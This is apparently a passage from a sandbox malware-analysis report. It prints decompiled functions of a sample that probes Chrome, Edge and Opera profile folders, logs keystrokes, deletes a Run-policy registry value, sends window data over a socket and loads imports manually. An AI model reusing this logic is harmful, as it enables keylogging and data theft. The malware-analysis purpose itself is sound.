                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,0040BB7D), ref: 0040BA70
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ExistsFilePath
                • String ID: UserProfile$\AppData\Local\Google\Chrome\
                • API String ID: 1174141254-4188645398
                • Opcode ID: 30d8304dee5dd343242b5c7e6b1708413699e83762e1f6619c83e17cad9642f1
                • Instruction ID: fa1b3df0c65eba921df0d08a7c52afbe64c16d4fabbb7ff89d5955b2db38ff16
                • Opcode Fuzzy Hash: 30d8304dee5dd343242b5c7e6b1708413699e83762e1f6619c83e17cad9642f1
                • Instruction Fuzzy Hash: D0F08230A0131AA6CA14FBE6DC478FF7B6CCD10754B10007FBA01B22D2EE79994586DE
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040BAA0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags) {
                				char _v28;
                				void* __ebp;
                				int _t10;
                				void* _t22;
                				void* _t25;
                				void* _t26;
                				void* _t27;
                
                				_t25 = __edi;
                				_t24 = __edx;
                				_t16 = __ebx;
                				_t26 = __ecx;
                				E0040415E(__ebx,  &_v28, __edx, _t27, E0043A99F(__ebx, __ecx, __eflags, L"UserProfile"));
                				L004086C6(__ebx,  &_v28, _t25, _t27, L"\\AppData\\Local\\Microsoft\\Edge\\");
                				_t10 = PathFileExistsW(E00401EE4( &_v28));
                				_t22 = _t26;
                				_t29 = _t10;
                				if(_t10 == 0) {
                					E0040415E(_t16, _t22, _t24, _t27, 0x46a8f0);
                				} else {
                					E00403242(_t16, _t22, _t27, _t29,  &_v28);
                				}
                				E00401EE9();
                				return _t26;
                			}











                APIs
                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000,?,?,?,?,?,?,0040BC46), ref: 0040BAD3
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ExistsFilePath
                • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                • API String ID: 1174141254-2800177040
                • Opcode ID: c12edad087ec841e52bd068fea6dfcced86c620b63673021869a425c546317f4
                • Instruction ID: e51b4f52c028d78bdf66c263ab0f3750d3580a43710b0836be6e4890ee81e12e
                • Opcode Fuzzy Hash: c12edad087ec841e52bd068fea6dfcced86c620b63673021869a425c546317f4
                • Instruction Fuzzy Hash: 5CF08231A0121A96CA14F7E6DC478FF7B6CCD10718B00007FBA01B22D2EE799941C6DE
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040BB03(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags) {
                				char _v28;
                				void* __ebp;
                				int _t10;
                				void* _t22;
                				void* _t25;
                				void* _t26;
                				void* _t27;
                
                				_t25 = __edi;
                				_t24 = __edx;
                				_t16 = __ebx;
                				_t26 = __ecx;
                				E0040415E(__ebx,  &_v28, __edx, _t27, E0043A99F(__ebx, __ecx, __eflags, L"AppData"));
                				L004086C6(__ebx,  &_v28, _t25, _t27, L"\\Opera Software\\Opera Stable\\");
                				_t10 = PathFileExistsW(E00401EE4( &_v28));
                				_t22 = _t26;
                				_t29 = _t10;
                				if(_t10 == 0) {
                					E0040415E(_t16, _t22, _t24, _t27, 0x46a8f0);
                				} else {
                					E00403242(_t16, _t22, _t27, _t29,  &_v28);
                				}
                				E00401EE9();
                				return _t26;
                			}











                APIs
                • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000,?,?,?,?,?,?,0040BCA9), ref: 0040BB36
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ExistsFilePath
                • String ID: AppData$\Opera Software\Opera Stable\
                • API String ID: 1174141254-1629609700
                • Opcode ID: b1708fa5d51ffda48a67eb2c30fb4e479c0b31e554d739664357c27a8378c1db
                • Instruction ID: e6a7174926e5e3b4842ccf786cfde627425bba0d2052536d9f30216573a1e43c
                • Opcode Fuzzy Hash: b1708fa5d51ffda48a67eb2c30fb4e479c0b31e554d739664357c27a8378c1db
                • Instruction Fuzzy Hash: 78F05E30A0021996CA14F7A2DC479FFBB6C9910718B10047FBA01B31D2EE799981C6EE
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 64%
                			E0040ABBC(void* __ebx, void* __ecx, void* __edx) {
                				void* _t4;
                				void* _t7;
                				void* _t10;
                				signed int _t12;
                				void* _t13;
                				void* _t17;
                				void* _t18;
                				void* _t19;
                				void* _t20;
                
                				_t17 = __edx;
                				_t10 = __ebx;
                				_t18 = __ecx;
                				_t12 = GetKeyState(0x11) & 0x0000ffff;
                				_t4 =  *((intOrPtr*)(_t18 + 0x4c)) - 0xa4;
                				if(_t4 == 0) {
                					_t13 = _t20 - 0x18;
                					_push("[AltL]");
                					L6:
                					E00402073(_t10, _t13, _t17, _t19);
                					return E00409B84(_t18);
                				}
                				_t7 = _t4 - 1;
                				if(_t7 == 0) {
                					if(_t12 == 0) {
                						_t13 = _t20 - 0x18;
                						_push("[AltR]");
                						goto L6;
                					}
                					return _t7;
                				} else {
                					E004099E3(_t18, _t20 - 0x18);
                					return E00409BA9(_t18);
                				}
                			}













                APIs
                • GetKeyState.USER32(00000011), ref: 0040ABC1
                  • Part of subcall function 004099E3: GetForegroundWindow.USER32(00000000,?,00000000), ref: 00409A17
                  • Part of subcall function 004099E3: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409A22
                  • Part of subcall function 004099E3: GetKeyboardLayout.USER32 ref: 00409A29
                  • Part of subcall function 004099E3: GetKeyState.USER32(00000010), ref: 00409A33
                  • Part of subcall function 004099E3: GetKeyboardState.USER32(?), ref: 00409A40
                  • Part of subcall function 004099E3: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409A5C
                  • Part of subcall function 00409BA9: SetEvent.KERNEL32(?,?,00000000,0040A780,00000000), ref: 00409BD5
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
                • String ID: [AltL]$[AltR]
                • API String ID: 3195419117-2658077756
                • Opcode ID: df627bc4a743b575a74da755f13919b46736de9882ceb998d69cc3f9b2f42ba8
                • Instruction ID: 96eefd13142f1eb0f51443313c58276a15165e9a298fe6b1d87f9ff32337ecc9
                • Opcode Fuzzy Hash: df627bc4a743b575a74da755f13919b46736de9882ceb998d69cc3f9b2f42ba8
                • Instruction Fuzzy Hash: 9AE0652170431017C918323E691BA7E392197C2774B40016FF9467B6D7D8BE9D5193CF
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 67%
                			E0040AC16(void* __ebx, void* __ecx) {
                				void* _t4;
                				void* _t7;
                				signed int _t9;
                				void* _t10;
                				void* _t12;
                				void* _t13;
                				void* _t14;
                				void* _t15;
                
                				_t7 = __ebx;
                				_t13 = __ecx;
                				_t9 = GetKeyState(0x12) & 0x0000ffff;
                				_t4 =  *((intOrPtr*)(_t13 + 0x4c)) - 0xa2;
                				if(_t4 == 0) {
                					if(_t9 == 0) {
                						_t10 = _t15 - 0x18;
                						_push("[CtrlL]");
                						goto L5;
                					}
                				} else {
                					_t4 = _t4 - 1;
                					if(_t4 == 0) {
                						_t10 = _t15 - 0x18;
                						_push("[CtrlR]");
                						L5:
                						E00402073(_t7, _t10, _t12, _t14);
                						return E00409B84(_t13);
                					}
                				}
                				return _t4;
                			}












                APIs
                • GetKeyState.USER32(00000012), ref: 0040AC1B
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: State
                • String ID: [CtrlL]$[CtrlR]
                • API String ID: 1649606143-2446555240
                • Opcode ID: 707982bc91fbbbd2a636e6f7f8ab650285e34d35857256a952e1c03f309ecd73
                • Instruction ID: 5068e35745fff1d0ae311e30ec864f18ca5ee1bac8daf42aff9a91bbfa6ecc8a
                • Opcode Fuzzy Hash: 707982bc91fbbbd2a636e6f7f8ab650285e34d35857256a952e1c03f309ecd73
                • Instruction Fuzzy Hash: E5E08621B0831017D924353F5A1E67A3910A7917A0F41027FF9426B6C6E87E8D2062CF
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040DCA3() {
                				void* __esi;
                
                				if( *0x474a68 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c])) + 4))) {
                					E00432CF1(0x474a68);
                					_t17 =  *0x474a68 - 0xffffffff;
                					if( *0x474a68 == 0xffffffff) {
                						E0041074B();
                						E0043307B(_t17, 0x456962);
                						E00432CB2(0x474a68, 0x474a68);
                					}
                				}
                				return 0x474a6c;
                			}





                APIs
                  • Part of subcall function 0043307B: __onexit.LIBCMT ref: 00433081
                • __Init_thread_footer.LIBCMT ref: 0041046C
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Init_thread_footer__onexit
                • String ID: hJG$lJG
                • API String ID: 1881088180-3986032958
                • Opcode ID: 3098f39f6e044b7fe1c83a17937fea0626eb8e384405a203024fdf0746d1f617
                • Instruction ID: 959a6744f9fea07c9b6c9e8e76648da5020df6129c556cb91e4ae22f1d5d63cc
                • Opcode Fuzzy Hash: 3098f39f6e044b7fe1c83a17937fea0626eb8e384405a203024fdf0746d1f617
                • Instruction Fuzzy Hash: 8DE0D8310415108AC110A71895829E933589B88325B61912FF904976918BAC19C1C75F
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 58%
                			E00412D0B(void* __ecx, short* __edx, short* _a4) {
                				void* _v8;
                				signed int _t6;
                
                				_push(__ecx);
                				if(RegOpenKeyExW(__ecx, __edx, 0, 2,  &_v8) == 0) {
                					_t6 = RegDeleteValueW(_v8, _a4);
                					asm("sbb al, al");
                					return  ~_t6 + 1;
                				}
                				return 0;
                			}






                APIs
                • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040C64D,00000000,00473220,00473238,?,pth_unenc), ref: 00412D19
                • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412D2D
                Strings
                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412D17
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: DeleteOpenValue
                • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                • API String ID: 2654517830-1051519024
                • Opcode ID: 73d02ef1f0cc626344373e057ae6400ba39a732c9e2669238d64bd595eb6c070
                • Instruction ID: 31757409137fc2aa28e21d2d38410cee3dd97c0c89aa87a52c5bf8b2ac0ec4d3
                • Opcode Fuzzy Hash: 73d02ef1f0cc626344373e057ae6400ba39a732c9e2669238d64bd595eb6c070
                • Instruction Fuzzy Hash: D6E0C27124820CBBEF104F71EE06FFB376CEB01F01F1002A5B90592191C66ADA149664
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 73%
                			E004167F1(void* __ebx) {
                				void* _t1;
                				void* _t5;
                				void* _t10;
                				void* _t12;
                
                				_t14 =  *0x470d61;
                				if( *0x470d61 == 0) {
                					 *0x470d61 = 1;
                					EnumWindows(E004165EC, 0);
                					E004020D6(__ebx, _t12 - 0x18, _t10, _t14, 0x473568);
                					_push(0x63);
                					E00404A81(0x4734e8, _t10, _t14);
                					_t5 = L00405A86(__ebx, 0x473568, _t10, 0x464074);
                					 *0x470d61 = 0;
                					return _t5;
                				}
                				return _t1;
                			}








                APIs
                • EnumWindows.USER32(Function_000165EC,00000000), ref: 00416809
                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: EnumWindowssend
                • String ID: h5G$4G
                • API String ID: 2535772952-2693735065
                • Opcode ID: 52884c4969bdfee6880f4c9df27e618c44e04f8f173a2268bf4e2e0b4762a65e
                • Instruction ID: 9fe717f4edf3aaa12838891801d990c24a3a4d72d66b7b51c9a4e32ebb080fb0
                • Opcode Fuzzy Hash: 52884c4969bdfee6880f4c9df27e618c44e04f8f173a2268bf4e2e0b4762a65e
                • Instruction Fuzzy Hash: 3FE080207C9350B6DB31B7697D0679D39064752B54F14007EB5043A3D2C6DD5581C7DE
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00411D93() {
                				int _t3;
                				signed int _t6;
                
                				 *0x470d4b = 0;
                				_t3 = TerminateProcess( *0x470d64, 0);
                				WaitForSingleObject( *0x470d64, 0xffffffff);
                				return _t6 & 0xffffff00 | _t3 != 0x00000000;
                			}






                APIs
                • TerminateProcess.KERNEL32(00000000,pth_unenc,0040EE0B), ref: 00411DA3
                • WaitForSingleObject.KERNEL32(000000FF), ref: 00411DB6
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ObjectProcessSingleTerminateWait
                • String ID: pth_unenc
                • API String ID: 1872346434-4028850238
                • Opcode ID: ad6d013055d9b0547f0538c52e8fbec790f1cdf5f70ab7e2b39207b65bdb286b
                • Instruction ID: e19746668ad3e5a2aa3259df84083bc395050bd976cc2345e4ea1c63972d9be6
                • Opcode Fuzzy Hash: ad6d013055d9b0547f0538c52e8fbec790f1cdf5f70ab7e2b39207b65bdb286b
                • Instruction Fuzzy Hash: 58D0C93414A311EBD7310BA0BC08B043B68A715362F140271F42C512F1C7659494AA59
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 16%
                			E00433B7E(intOrPtr _a4) {
                				char _v16;
                				char* _t11;
                				char* _t14;
                				void* _t17;
                
                				_t11 =  &_v16;
                				E00433B3D(_t11, _a4);
                				E004379F6( &_v16,  &E0046C448);
                				asm("int3");
                				_t14 = _t11;
                				asm("lock xadd [0x46f024], eax");
                				if(1 == 0) {
                					_t17 = 0x470060;
                					do {
                						E0043444B(_t17);
                						_t17 = _t17 + 0x18;
                					} while (_t17 < 0x470120);
                				}
                				return _t14;
                			}








                APIs
                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00433B8A
                  • Part of subcall function 00433B3D: std::exception::exception.LIBCONCRT ref: 00433B4A
                • __CxxThrowException@8.LIBVCRUNTIME ref: 00433B98
                  • Part of subcall function 004379F6: RaiseException.KERNEL32(?,?,00433B7D,?,?,?,00000000,?,?,?,P@,00433B7D,?,0046C40C,00000000), ref: 00437A55
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ExceptionException@8RaiseThrowstd::exception::exceptionstd::invalid_argument::invalid_argument
                • String ID: P@
                • API String ID: 1586462112-676759640
                • Opcode ID: be34dfb19e6d27ab7c593c9c32c23ad28ddfa9a66cdc613b31972520aea6299d
                • Instruction ID: fee150121e0675781914aead59bbd43a186a04d22f31c7314f5b286c5f6f48c1
                • Opcode Fuzzy Hash: be34dfb19e6d27ab7c593c9c32c23ad28ddfa9a66cdc613b31972520aea6299d
                • Instruction Fuzzy Hash: D0C08CB4C0030CB7CB00FBE5C856E9DB73C9F08304F50852ABA5092082EB78A30987DA
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0043F561(void* __edx, short* _a4, char* _a8, int _a12, intOrPtr _a16) {
                				char* _v8;
                				int _v12;
                				char _v16;
                				char _v24;
                				char _v28;
                				void* __ebx;
                				char _t34;
                				int _t35;
                				int _t38;
                				long _t39;
                				char* _t42;
                				int _t44;
                				int _t47;
                				int _t53;
                				intOrPtr _t55;
                				void* _t56;
                				char* _t57;
                				char* _t62;
                				char* _t63;
                				void* _t64;
                				int _t65;
                				short* _t67;
                				short* _t68;
                				int _t69;
                				intOrPtr* _t70;
                
                				_t64 = __edx;
                				_t53 = _a12;
                				_t67 = _a4;
                				_t68 = 0;
                				if(_t67 == 0) {
                					L3:
                					if(_a8 != _t68) {
                						E004390B7(_t53,  &_v28, _t64, _a16);
                						_t34 = _v24;
                						__eflags = _t67;
                						if(_t67 == 0) {
                							__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
                							if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
                								_t69 = _t68 | 0xffffffff;
                								_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t68, _t68);
                								__eflags = _t35;
                								if(_t35 != 0) {
                									L29:
                									_t28 = _t35 - 1; // -1
                									_t69 = _t28;
                									L30:
                									__eflags = _v16;
                									if(_v16 != 0) {
                										_t55 = _v28;
                										_t31 = _t55 + 0x350;
                										 *_t31 =  *(_t55 + 0x350) & 0xfffffffd;
                										__eflags =  *_t31;
                									}
                									return _t69;
                								}
                								 *((intOrPtr*)(E0043EEAD())) = 0x2a;
                								goto L30;
                							}
                							_t70 = _a8;
                							_t56 = _t70 + 1;
                							do {
                								_t38 =  *_t70;
                								_t70 = _t70 + 1;
                								__eflags = _t38;
                							} while (_t38 != 0);
                							_t69 = _t70 - _t56;
                							goto L30;
                						}
                						__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
                						if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
                							_t69 = _t68 | 0xffffffff;
                							_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t67, _t53);
                							__eflags = _t35;
                							if(_t35 != 0) {
                								goto L29;
                							}
                							_t39 = GetLastError();
                							__eflags = _t39 - 0x7a;
                							if(_t39 != 0x7a) {
                								L21:
                								 *((intOrPtr*)(E0043EEAD())) = 0x2a;
                								 *_t67 = 0;
                								goto L30;
                							}
                							_t42 = _a8;
                							_t57 = _t42;
                							_v8 = _t57;
                							_t65 = _t53;
                							__eflags = _t53;
                							if(_t53 == 0) {
                								L20:
                								_t44 = MultiByteToWideChar( *(_v24 + 8), 1, _t42, _t57 - _t42, _t67, _t53);
                								__eflags = _t44;
                								if(_t44 != 0) {
                									_t69 = _t44;
                									goto L30;
                								}
                								goto L21;
                							} else {
                								goto L15;
                							}
                							while(1) {
                								L15:
                								_t45 =  *_t57;
                								_v12 = _t65 - 1;
                								__eflags =  *_t57;
                								if(__eflags == 0) {
                									break;
                								}
                								_t47 = E00449490(__eflags, _t45 & 0x000000ff,  &_v24);
                								_t62 = _v8;
                								__eflags = _t47;
                								if(_t47 == 0) {
                									L18:
                									_t65 = _v12;
                									_t57 = _t62 + 1;
                									_v8 = _t57;
                									__eflags = _t65;
                									if(_t65 != 0) {
                										continue;
                									}
                									break;
                								}
                								_t62 = _t62 + 1;
                								__eflags =  *_t62;
                								if( *_t62 == 0) {
                									goto L21;
                								}
                								goto L18;
                							}
                							_t42 = _a8;
                							goto L20;
                						}
                						__eflags = _t53;
                						if(_t53 == 0) {
                							goto L30;
                						}
                						_t63 = _a8;
                						while(1) {
                							 *_t67 =  *(_t68 + _t63) & 0x000000ff;
                							__eflags =  *(_t68 + _t63);
                							if( *(_t68 + _t63) == 0) {
                								goto L30;
                							}
                							_t68 =  &(_t68[0]);
                							_t67 =  &(_t67[1]);
                							__eflags = _t68 - _t53;
                							if(_t68 < _t53) {
                								continue;
                							}
                							goto L30;
                						}
                						goto L30;
                					}
                					 *((intOrPtr*)(E0043EEAD())) = 0x16;
                					return E0043A5BB() | 0xffffffff;
                				}
                				if(_t53 != 0) {
                					 *_t67 = 0;
                					goto L3;
                				}
                				return 0;
                			}

                APIs
                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D35), ref: 0043F5F7
                • GetLastError.KERNEL32 ref: 0043F605
                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043F660
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharMultiWide$ErrorLast
                • String ID:
                • API String ID: 1717984340-0
                • Opcode ID: 4fb4c8b8568d1047ed6eec146a53b7fea1d3df898e1d451945ab7130e1f9dab9
                • Instruction ID: 66686387026925be6180075210ad86107624aebec9d48f20dae67bb7d6d05db2
                • Opcode Fuzzy Hash: 4fb4c8b8568d1047ed6eec146a53b7fea1d3df898e1d451945ab7130e1f9dab9
                • Instruction Fuzzy Hash: 7541F831E04206AFDB218F65C846ABB7BA4DF09320F14517FF895972B1DB388D06CB59
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 78%
                			E004110A2(intOrPtr* __ecx) {
                				intOrPtr _t38;
                				intOrPtr _t41;
                				void _t49;
                				int _t52;
                				signed short _t54;
                				signed int _t55;
                				intOrPtr _t56;
                				intOrPtr _t58;
                				intOrPtr _t59;
                				signed short* _t60;
                				intOrPtr _t66;
                				intOrPtr _t69;
                				intOrPtr _t73;
                				void _t74;
                				void* _t77;
                				intOrPtr* _t78;
                				void* _t81;
                				void* _t83;
                				void* _t84;
                
                				_t78 = __ecx;
                				_t77 = 1;
                				_t38 =  *__ecx;
                				_t58 =  *((intOrPtr*)(__ecx + 4));
                				 *((intOrPtr*)(_t84 + 0x10)) = _t58;
                				if( *((intOrPtr*)(_t38 + 0x84)) != 0) {
                					_t81 =  *((intOrPtr*)(_t38 + 0x80)) + _t58;
                					if(IsBadReadPtr(_t81, 0x14) == 0) {
                						_t83 = _t81 + 0x10;
                						while(1) {
                							_t41 =  *((intOrPtr*)(_t83 - 4));
                							if(_t41 == 0) {
                								goto L24;
                							}
                							_t59 =  *((intOrPtr*)(_t78 + 0x24))(_t41 + _t58,  *((intOrPtr*)(_t78 + 0x34)));
                							 *((intOrPtr*)(_t84 + 0x20)) = _t59;
                							if(_t59 == 0) {
                								SetLastError(0x7e);
                								goto L23;
                							} else {
                								_push(4 +  *(_t78 + 0xc) * 4);
                								_push( *((intOrPtr*)(_t78 + 8)));
                								_t66 = E0043F7DD();
                								if(_t66 == 0) {
                									 *((intOrPtr*)(_t78 + 0x2c))(_t59,  *((intOrPtr*)(_t78 + 0x34)));
                									SetLastError(0xe);
                									L23:
                									_t77 = 0;
                								} else {
                									 *((intOrPtr*)(_t78 + 8)) = _t66;
                									 *((intOrPtr*)(_t66 +  *(_t78 + 0xc) * 4)) = _t59;
                									 *(_t78 + 0xc) =  *(_t78 + 0xc) + 1;
                									_t49 =  *(_t83 - 0x10);
                									if(_t49 == 0) {
                										_t49 =  *_t83;
                									}
                									_t69 =  *((intOrPtr*)(_t84 + 0x14));
                									_t74 =  *_t83;
                									_t60 = _t49 + _t69;
                									if( *_t60 != 0) {
                										 *((intOrPtr*)(_t84 + 0x10)) = _t74 - _t60 + _t69;
                										while(1) {
                											_t54 =  *_t60;
                											_push( *((intOrPtr*)(_t78 + 0x34)));
                											if(_t54 >= 0) {
                												_t55 = _t54 + _t69 + 2;
                											} else {
                												_t55 = _t54 & 0x0000ffff;
                											}
                											_t56 =  *((intOrPtr*)(_t78 + 0x28))( *((intOrPtr*)(_t84 + 0x20)), _t55);
                											_t73 =  *((intOrPtr*)(_t84 + 0x1c));
                											_t84 = _t84 + 0xc;
                											 *((intOrPtr*)(_t73 + _t60)) = _t56;
                											if( *((intOrPtr*)(_t73 + _t60)) == 0) {
                												break;
                											}
                											_t69 =  *((intOrPtr*)(_t84 + 0x14));
                											_t60 =  &(_t60[2]);
                											if( *_t60 != 0) {
                												continue;
                											} else {
                											}
                											goto L17;
                										}
                										_t77 = 0;
                									}
                									L17:
                									if(_t77 == 0) {
                										 *((intOrPtr*)(_t78 + 0x2c))( *((intOrPtr*)(_t84 + 0x1c)),  *((intOrPtr*)(_t78 + 0x34)));
                										SetLastError(0x7f);
                									} else {
                										_t83 = _t83 + 0x14;
                										_t52 = IsBadReadPtr(_t83 - 0x10, 0x14);
                										_t58 =  *((intOrPtr*)(_t84 + 0x14));
                										if(_t52 == 0) {
                											continue;
                										} else {
                										}
                									}
                								}
                							}
                							goto L24;
                						}
                					}
                					L24:
                				}
                				return _t77;
                			}

                APIs
                • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411433), ref: 004110CF
                • IsBadReadPtr.KERNEL32(?,00000014,00411433), ref: 0041119B
                • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004111BD
                • SetLastError.KERNEL32(0000007E,00411433), ref: 004111D4
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLastRead
                • String ID:
                • API String ID: 4100373531-0
                • Opcode ID: 9794c43bf96480927521ed5b23b738f4c51868486ab28171da95fa3270170194
                • Instruction ID: 8f6c103362ea378475082746bf01fa46c2f289026e2d243d47b01123f6745c32
                • Opcode Fuzzy Hash: 9794c43bf96480927521ed5b23b738f4c51868486ab28171da95fa3270170194
                • Instruction Fuzzy Hash: 36418E71604305AFEB248F19DC84BA7B7E5FF48714F00482EEB46876A1EB34E845CB19
                Uniqueness

                Uniqueness Score: -1.00%